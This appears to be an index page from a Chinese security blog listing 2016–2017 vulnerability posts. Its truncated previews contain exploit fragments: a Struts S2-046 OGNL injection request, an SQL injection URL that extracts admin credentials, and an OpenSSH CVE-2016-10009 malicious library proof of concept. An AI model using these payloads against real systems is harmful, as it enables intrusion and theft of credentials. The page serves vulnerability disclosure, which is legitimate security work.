• S2-046 PoC

    S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatche...
    作者:unhonker| 发布:2017年3月21日 | 分类:漏洞公布 | 阅读:3,041次| 标签:
  • Fiyo CMS 2.0.6.1 权限提升漏洞

    Fiyo CMS 2.0.6.1 权限提升漏洞
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacent...
    作者:unhonker| 发布:2017年3月13日 | 分类:漏洞公布 | 阅读:2,597次| 标签:
  • st2-045测试工具

    st2-045测试工具
    相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架
    作者:unhonker| 发布:2017年3月07日 | 分类:漏洞公布 | 阅读:4,990次| 标签:
  • MySQL文件上传-ID参数SQL注入

    MySQL文件上传-ID参数SQL注入
    SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+...
    作者:unhonker| 发布:2017年2月08日 | 分类:漏洞公布 | 阅读:2,456次|
  • OpenSSH 7.4代理协议任意库加载漏洞

    OpenSSH 7.4代理协议任意库加载漏洞
    CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through system() unsetenv("LD_PRELOAD"); unsetenv("LD_LIBRARY_PATH"); system("id > /tmp/test"); ...
    作者:unhonker| 发布:2016年12月25日 | 分类:漏洞公布 | 阅读:2,734次| 标签:
  • burpsuite V1.7.11

    burpsuite V1.7.11
    之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。 下载地址: Burp v1.7
    作者:unhonker| 发布:2016年12月05日 | 分类:个人关注 | 阅读:2,491次| 标签: